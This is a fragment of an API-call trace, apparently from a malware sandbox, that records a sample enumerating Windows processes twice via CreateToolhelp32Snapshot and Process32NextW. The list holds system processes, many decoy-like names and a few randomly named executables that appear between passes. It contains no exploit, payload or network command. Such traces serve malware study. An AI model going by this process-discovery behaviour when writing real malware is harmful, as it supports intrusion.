hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.366] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.367] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.370] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.371] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.373] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0150.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0150.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.419] CloseHandle (hObject=0xc4) returned 1 [0150.419] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.423] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.424] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0150.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0150.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.447] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.449] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.450] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.452] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0150.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0150.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0150.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0150.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0150.517] 